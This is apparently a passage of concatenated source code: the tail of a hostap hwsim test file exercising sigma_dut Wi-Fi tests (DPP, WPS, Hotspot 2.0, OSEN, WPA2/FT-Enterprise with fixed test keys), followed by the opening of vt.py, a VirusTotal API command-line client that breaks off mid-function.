"30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg" ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b" params = {"ssid": "DPPNET01", "wpa": "2", "ieee80211w": "2", "wpa_key_mgmt": "DPP", "rsn_pairwise": "CCMP", "dpp_connector": ap_connector, "dpp_csign": csign_pub, "dpp_netaccesskey": ap_netaccesskey} try: hapd = hostapd.add_ap(apdev[0], params) except: raise HwsimSkip("DPP not supported") dev[0].set("dpp_config_processing", "2") cmd = "DPP_CONFIGURATOR_ADD key=" + csign res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) dev[1].set("dpp_configurator_params", " conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id)) cmd = "DPP_LISTEN 2437 role=configurator" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) def test_sigma_dut_dpp_proto_peer_disc_req(dev, apdev): """sigma_dut DPP protocol testing - Peer Discovery Request""" sigma = start_sigma_dut(dev[0].ifname) try: init_sigma_dut_dpp_proto_peer_disc_req(dev, apdev) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes,DPPStep,MissingAttribute,DPPFrameType,PeerDiscoveryRequest,DPPIEAttribute,TransactionID", timeout=10) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,Errorsent" not in res: raise Exception("Unexpected result: " + res) finally: dev[0].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def test_sigma_dut_dpp_self_config(dev, apdev): """sigma_dut DPP Configurator enrolling an AP and using self-configuration""" check_dpp_capab(dev[0]) hapd = hostapd.add_ap(apdev[0], {"ssid": "unconfigured"}) check_dpp_capab(hapd) sigma = start_sigma_dut(dev[0].ifname) try: dev[0].set("dpp_config_processing", "2") id = hapd.dpp_bootstrap_gen(chan="81/1", mac=True) uri = hapd.request("DPP_BOOTSTRAP_GET_URI %d" % id) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,AP,DPPBS,QR,DPPTimeout,6") if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) update_hapd_config(hapd) cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPCryptoIdentifier,P-256,DPPBS,QR,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPAuthDirection,Single,DPPConfIndex,1,DPPTimeout,6,DPPWaitForConnect,Yes,DPPSelfConfigure,Yes" res = sigma_dut_cmd(cmd, timeout=10) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: stop_sigma_dut(sigma) dev[0].set("dpp_config_processing", "0") def test_sigma_dut_ap_dpp_self_config(dev, apdev, params): """sigma_dut DPP AP Configurator using self-configuration""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_dpp_self_config.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: run_sigma_dut_ap_dpp_self_config(dev, apdev) finally: stop_sigma_dut(sigma) dev[0].set("dpp_config_processing", "0") def run_sigma_dut_ap_dpp_self_config(dev, apdev): check_dpp_capab(dev[0]) sigma_dut_cmd_check("ap_reset_default,program,DPP") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,AP,DPPBS,QR,DPPConfIndex,1,DPPSelfConfigure,Yes,DPPTimeout,6", timeout=10) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) dev[0].set("dpp_config_processing", "2") id = dev[0].dpp_bootstrap_gen(chan="81/11", mac=True) uri = dev[0].request("DPP_BOOTSTRAP_GET_URI %d" % id) cmd = "DPP_LISTEN 2462 role=enrollee" if "OK" not in dev[0].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6" res = sigma_dut_cmd(cmd) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) dev[0].wait_connected() dev[0].request("DISCONNECT") dev[0].wait_disconnected() sigma_dut_cmd_check("ap_reset_default") def test_sigma_dut_preconfigured_profile(dev, apdev): """sigma_dut controlled connection using preconfigured profile""" try: run_sigma_dut_preconfigured_profile(dev, apdev) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_preconfigured_profile(dev, apdev): ifname = dev[0].ifname sigma = start_sigma_dut(ifname) params = hostapd.wpa2_params(ssid="test-psk", passphrase="12345678") hapd = hostapd.add_ap(apdev[0], params) dev[0].connect("test-psk", psk="12345678", scan_freq="2412", only_add_network=True) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s" % (ifname, "test-psk")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_wps_pbc(dev, apdev): """sigma_dut and WPS PBC Enrollee""" try: run_sigma_dut_wps_pbc(dev, apdev) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_wps_pbc(dev, apdev): ssid = "test-wps-conf" hapd = hostapd.add_ap(apdev[0], {"ssid": "wps", "eap_server": "1", "wps_state": "2", "wpa_passphrase": "12345678", "wpa": "2", "wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"}) hapd.request("WPS_PBC") ifname = dev[0].ifname sigma = start_sigma_dut(ifname) cmd = "start_wps_registration,interface,%s" % ifname cmd += ",WpsRole,Enrollee" cmd += ",WpsConfigMethod,PBC" sigma_dut_cmd_check(cmd, timeout=15) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) hapd.disable() sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) dev[0].flush_scan_cache() def test_sigma_dut_sta_scan_bss(dev, apdev): """sigma_dut sta_scan_bss""" hapd = hostapd.add_ap(apdev[0], {"ssid": "test"}) sigma = start_sigma_dut(dev[0].ifname) try: cmd = "sta_scan_bss,Interface,%s,BSSID,%s" % (dev[0].ifname, \ hapd.own_addr()) res = sigma_dut_cmd(cmd, timeout=10) if "ssid,test,bsschannel,1" not in res: raise Exception("Unexpected result: " + res) finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_osen(dev, apdev, params): """sigma_dut controlled AP with OSEN""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_osen.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-hs20,MODE,11ng") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OSEN,PMF,Optional") sigma_dut_cmd_check("ap_config_commit,NAME,AP") # RSN-OSEN (for OSU) dev[0].connect("test-hs20", proto="OSEN", key_mgmt="OSEN", pairwise="CCMP", group="GTK_NOT_USED", eap="WFA-UNAUTH-TLS", identity="osen@example.com", ca_cert="auth_serv/ca.pem", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_eap_osen(dev, apdev, params): """sigma_dut controlled AP with EAP+OSEN""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_eap_osen.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, bridge="ap-br0", hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-hs20,MODE,11ng") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-OSEN,PMF,Optional") sigma_dut_cmd_check("ap_config_commit,NAME,AP") subprocess.call(['brctl', 'setfd', 'ap-br0', '0']) subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'up']) # RSN-OSEN (for OSU) dev[0].connect("test-hs20", proto="OSEN", key_mgmt="OSEN", pairwise="CCMP", eap="WFA-UNAUTH-TLS", identity="osen@example.com", ca_cert="auth_serv/ca.pem", ieee80211w='2', scan_freq="2412") # RSN-EAP (for data connection) dev[1].connect("test-hs20", key_mgmt="WPA-EAP", eap="TTLS", identity="hs20-test", password="password", ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2", ieee80211w='2', scan_freq="2412") hwsim_utils.test_connectivity(dev[0], dev[1], broadcast=False, success_expected=False, timeout=1) sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'down'], stderr=open('/dev/null', 'w')) subprocess.call(['brctl', 'delbr', 'ap-br0'], stderr=open('/dev/null', 'w')) def test_sigma_dut_ap_eap(dev, apdev, params): """sigma_dut controlled AP WPA2-Enterprise""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_eap.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-eap,MODE,11ng") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-eap", key_mgmt="WPA-EAP", eap="GPSK", identity="gpsk user", password="abcdefghijklmnop0123456789abcdef", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_eap_sha256(dev, apdev, params): """sigma_dut controlled AP WPA2-Enterprise SHA256""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_eap_sha256.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-eap,MODE,11ng") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-256") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-eap", key_mgmt="WPA-EAP-SHA256", eap="GPSK", identity="gpsk user", password="abcdefghijklmnop0123456789abcdef", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_ft_eap(dev, apdev, params): """sigma_dut controlled AP FT-EAP""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_ft_eap.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ft-eap,MODE,11ng,DOMAIN,0101,FT_OA,Enable") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,FT-EAP") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-ft-eap", key_mgmt="FT-EAP", eap="GPSK", identity="gpsk user", password="abcdefghijklmnop0123456789abcdef", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_ft_psk(dev, apdev, params): """sigma_dut controlled AP FT-PSK""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_ft_psk.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ft-psk,MODE,11ng,DOMAIN,0101,FT_OA,Enable") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,FT-PSK,PSK,12345678") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-ft-psk", key_mgmt="FT-PSK", psk="12345678", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_ent_ft_eap(dev, apdev, params): """sigma_dut controlled AP WPA-EAP and FT-EAP""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_ent_ft_eap.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ent-ft-eap,MODE,11ng,DOMAIN,0101,FT_OA,Enable") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-FT-EAP") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-ent-ft-eap", key_mgmt="FT-EAP", eap="GPSK", identity="gpsk user", password="abcdefghijklmnop0123456789abcdef", scan_freq="2412") dev[1].connect("test-ent-ft-eap", key_mgmt="WPA-EAP", eap="GPSK", identity="gpsk user", password="abcdefghijklmnop0123456789abcdef", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_venue_url(dev, apdev): """sigma_dut controlled Venue URL fetch""" try: run_sigma_dut_venue_url(dev, apdev) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_venue_url(dev, apdev): ifname = dev[0].ifname sigma = start_sigma_dut(ifname, debug=True) ssid = "venue" params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678") params["wpa_key_mgmt"] = "WPA-PSK-SHA256" params["ieee80211w"] = "2" venue_group = 1 venue_type = 13 venue_info = struct.pack('BB', venue_group, venue_type) lang1 = "eng" name1 = "Example venue" lang2 = "fin" name2 = "Esimerkkipaikka" venue1 = struct.pack('B', len(lang1 + name1)) + lang1.encode() + name1.encode() venue2 = struct.pack('B', len(lang2 + name2)) + lang2.encode() + name2.encode() venue_name = binascii.hexlify(venue_info + venue1 + venue2) url1 = "http://example.com/venue" url2 = "https://example.org/venue-info/" params["venue_group"] = str(venue_group) params["venue_type"] = str(venue_type) params["venue_name"] = [lang1 + ":" + name1, lang2 + ":" + name2] params["venue_url"] = ["1:" + url1, "2:" + url2] hapd = hostapd.add_ap(apdev[0], params) sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required" % (ifname, "venue", "12345678")) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "venue")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_hs2_venue_info,interface," + ifname + ",Display,Yes") sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_hs20_assoc_24(dev, apdev): """sigma_dut controlled Hotspot 2.0 connection (2.4 GHz)""" run_sigma_dut_hs20_assoc(dev, apdev, True) def test_sigma_dut_hs20_assoc_5(dev, apdev): """sigma_dut controlled Hotspot 2.0 connection (5 GHz)""" run_sigma_dut_hs20_assoc(dev, apdev, False) def run_sigma_dut_hs20_assoc(dev, apdev, band24): hapd0 = None hapd1 = None try: bssid0 = apdev[0]['bssid'] params = hs20_ap_params() params['hessid'] = bssid0 hapd0 = hostapd.add_ap(apdev[0], params) bssid1 = apdev[1]['bssid'] params = hs20_ap_params() params['hessid'] = bssid0 params["hw_mode"] = "a" params["channel"] = "36" params["country_code"] = "US" hapd1 = hostapd.add_ap(apdev[1], params) band = "2.4" if band24 else "5" exp_bssid = bssid0 if band24 else bssid1 run_sigma_dut_hs20_assoc_2(dev, apdev, band, exp_bssid) finally: dev[0].request("DISCONNECT") if hapd0: hapd0.request("DISABLE") if hapd1: hapd1.request("DISABLE") subprocess.call(['iw', 'reg', 'set', '00']) dev[0].flush_scan_cache() def run_sigma_dut_hs20_assoc_2(dev, apdev, band, expect_bssid): check_eap_capa(dev[0], "MSCHAPV2") dev[0].flush_scan_cache() ifname = dev[0].ifname sigma = start_sigma_dut(ifname, debug=True) sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,HS2-R3" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_add_credential,interface,%s,type,uname_pwd,realm,example.com,username,hs20-test,password,password" % ifname) res = sigma_dut_cmd_check("sta_hs2_associate,interface,%s,band,%s" % (ifname, band), timeout=15) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) if "BSSID," + expect_bssid not in res: raise Exception("Unexpected BSSID: " + res) def test_sigma_dut_ap_hs20(dev, apdev, params): """sigma_dut controlled AP with Hotspot 2.0 parameters""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_hs20.sigma-hostapd") conffile = os.path.join(params['logdir'], "sigma_dut_ap_hs20.sigma-conf") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True) try: sigma_dut_cmd_check("ap_reset_default,NAME,AP,program,HS2-R3") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,test-hs20,MODE,11ng") sigma_dut_cmd_check("ap_set_radius,NAME,AP,WLAN_TAG,1,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,WPA2-ENT") sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,HESSID,02:12:34:56:78:9a,NAI_REALM_LIST,1,OPER_NAME,1") sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,OSU_SERVER_URI,https://example.com/ https://example.org/,OSU_SSID,test-osu,OSU_METHOD,SOAP SOAP,OSU_PROVIDER_LIST,10,OSU_PROVIDER_NAI_LIST,4") sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,NET_AUTH_TYPE,2") sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,VENUE_NAME,1") sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,DOMAIN_LIST,example.com") sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,OPERATOR_ICON_METADATA,1") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,SSID,test-osu,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,NONE") sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,2,OSU,1") sigma_dut_cmd_check("ap_config_commit,NAME,AP") with open("/tmp/sigma_dut-ap.conf", "rb") as f: with open(conffile, "wb") as f2: f2.write(f.read()) sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma)
vt.py
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright (C) 2011-2019 DoomedRaven. # This file is part of VirusTotalApi - https://github.com/doomedraven/VirusTotalApi # See the file 'LICENSE.md' for copying permission. from __future__ import print_function # Full VT APIv3 functions added by Andriy Brukhovetskyy # doomedraven - Twitter : @d00m3dr4v3n # For more information look at: # # https://www.virustotal.com/en/documentation/public-api # https://www.virustotal.com/en/documentation/private-api # https://www.virustotal.com/intelligence/help/ # https://developers.virustotal.com/v3.0/reference#overview __author__ = 'Andriy Brukhovetskyy - DoomedRaven' __version__ = '4.0.0.0a2' __license__ = 'For fun :)' import os import re import ast import sys import csv import six import time import json import email import base64 import hashlib import argparse import requests import threading from glob import glob from re import match from collections import deque from operator import methodcaller from datetime import datetime from dateutil.relativedelta import relativedelta from six.moves.urllib.parse import urlparse # print mysql style tables import texttable as tt # parse OUTLOOK .msg try: from thirdpart.outlook_parser import OUTLOOK OUTLOOK_prsr = True except ImportError: OUTLOOK_prsr = False try: import HTMLParser HAVE_HTMLPARSER = True except ImportError: HAVE_HTMLPARSER = False try: import urllib3 urllib3.disable_warnings() except (AttributeError, ImportError): pass try: import pefile import peutils PEFILE = True except ImportError: PEFILE = False try: import magic MAGIC = True except ImportError: MAGIC = False apikey = "" req_timeout = 60 re_compile_orig = re.compile proxies = {} if os.getenv("PROXY"): proxies = { "http": os.getenv("PROXY"), "https": os.getenv("PROXY") } def is_valid_file(path): if os.path.exists(path) and path.endswith(('.yara', '.yar')): return path else: print("The file {fname} does not exist!".format(fname=path)) return False def private_api_access_error(): print('\n[!] You don\'t have permission for this operation, Looks like you trying to access to PRIVATE API functions\n') sys.exit() def get_sizes(dictionary): key_s = 20 value_s = 20 key_s = max([len(str(key)) for key in list(dictionary.keys())]) value_s = max([len(str(value)) for value in list(dictionary.values())]) if value_s > 80: value_s = 80 elif value_s < 5: value_s = 5 return key_s, value_s def get_adequate_table_sizes(scans, short=False, short_list=False): av_size_f = 14 result_f = 6 version_f = 9 if scans: # Result len if short: av_size = max([len(engine) if engine is not None and engine in short_list else 0 for engine in scans] ) result = max([len(scans[engine]['result']) if 'result' in scans[engine] and scans[engine]['result'] is not None and engine in short_list else 0 for engine in scans] ) version = max([len(scans[engine]['engine_version']) if 'engine_version' in scans[engine] and scans[engine]['engine_version'] is not None and engine in short_list else 0 for engine in scans] ) else: av_size = max([len(engine) if engine is not None else 0 for engine in scans]) result = max([len(scans[engine]['result']) if 'result' in scans[ engine] and scans[engine]['result'] is not None else 0 for engine in scans] ) version = max([len(scans[engine]['engine_version']) if 'engine_version' in scans[ engine] and scans[engine]['engine_version'] is not None else 0 for engine in scans] ) if result > result_f: result_f = result if av_size > av_size_f: av_size_f = av_size if version > version_f: version_f = version return av_size_f, result_f, version_f def pretty_print(block, headers, sizes=False, align=False, email=False): try: tab = tt.Texttable() if email: tab.set_deco(tt.Texttable.HEADER) if isinstance(block, list): plist = [headers] for line in block: if len(headers) == 1: plist.append([line]) else: plist.append( [line[key] if line.get(key) else ' -- ' for key in headers] ) if len(plist) > 1 and isinstance(plist[0], list): tab.add_rows(plist) else: tab.add_row(plist[0]) else: row = [block[key] if block.get(key) else ' -- ' for key in headers] tab.add_row(row) tab.header(headers) if not align: align = ['l' for key in headers] if sizes: tab.set_cols_width(sizes) tab.set_cols_align(align) print(tab.draw()) except Exception as e: print('Report me plz') print(e) def pretty_print_special(rows, headers, sizes=False, align=False, email=False): try: tab = tt.Texttable() if email: tab.set_deco(tt.Texttable.HEADER) tab.add_rows(rows) if sizes: tab.set_cols_width(sizes) if align: tab.set_cols_align(align) tab.header(headers) print('\n') print(tab.draw()) except Exception as e: print('Report me plz') print(e) def is_file(value): # check if is file and if file is json, avoit recognize input file as dumped json try: if isinstance(value, list): if os.path.isfile(value[0]) and value[0].endswith('.json'): return True, value[0] else: return False, value[0] elif isinstance(value, str): if os.path.isfile(value) and value.endswith('.json'): return True, value else: return False, value except IndexError: print('\n[!] You need to provide some arguments\n') sys.exit() def jsondump(jdata, sha1): jsondumpfile = open('VTDL_{name}.json'.format(name=sha1), 'w') json.dump(jdata, jsondumpfile, indent=4) jsondumpfile.close() print('\n\tJSON Written to File -- VTDL_{sha1}.json\n'.format(sha1=sha1)) def load_file(file_path): if file_path.endswith('.json'): try: log = open(file_path, 'r').read() jdata = json.loads(log) return jdata except TypeError: print('\n[!] Check your json dump file\n') def get_detections(scans, manual_engines = False, **kwargs): plist = [[]] if manual_engines: engines = manual_engines if engines == list(): return elif isinstance(engines, six.string_types) and engines.find(',') != -1: engines = engines.split(',') elif isinstance(engines, six.string_types): engines = [engines] # lower case for easier comparison engines = [eng.lower().strip() for eng in engines] short_list = list() for engine in list(scans.keys()): engine = engine.strip() if engine.lower() in engines and scans[engine]: short_list.append(engine) plist.append([engine, scans[engine]['result'], scans[engine]['engine_version'] if 'engine_version' in scans[engine] and scans[engine]['engine_version'] else ' -- ', scans[engine]['engine_update'] if 'engine_update' in scans[engine] and scans[engine]['engine_update'] else ' -- ' ]) if plist != [[]]: av_size, result_size, version = get_adequate_table_sizes(scans, True, short_list) pretty_print_special(plist, ['Vendor name', 'Result', 'Version', 'Last Update'], [av_size, result_size, version, 11], ['r', 'l', 'l', 'c'], kwargs.get('email_template') ) def dump_csv(filename, scans): f = open('VTDL{0}.csv'.format(filename), 'w') writer = csv.writer(f, delimiter=',') writer.writerow( ('Vendor name', 'Detected', 'Result', 'Version', 'Last Update')) for x in sorted(scans): writer.writerow([x, 'True' if scans[x]['detected'] else 'False', scans[ x]['result'] if scans[x]['result'] else ' -- ', scans[x]['version'] if 'version' in scans[x] and scans[x]['version'] else ' -- ', scans[x]['update'] if 'update' in scans[x] and scans[x]['update'] else ' -- ' ]) f.close() print('\n\tCSV file dumped as: VTDL{0}.csv'.format(filename)) def parse_report(jdata, **kwargs): filename = '' if _check_error(jdata) is False: if not kwargs.get('not_exit'): return False else: _check_error(jdata) return if jdata.get('scan_date'): print('\nScanned on : \n\t{0}'.format(jdata.get('scan_date'))) if jdata.get('total'): print('\nDetections:\n\t {positives}/{total} Positives/Total'.format(positives=jdata.get('positives'), total=jdata.get('total'))) if kwargs.get('url_report'): if jdata.get('url'): print('\nScanned url :\n\t {url}'.format(url=jdata.get('url'))) else: if not kwargs.get('verbose') and 'scans' in jdata: 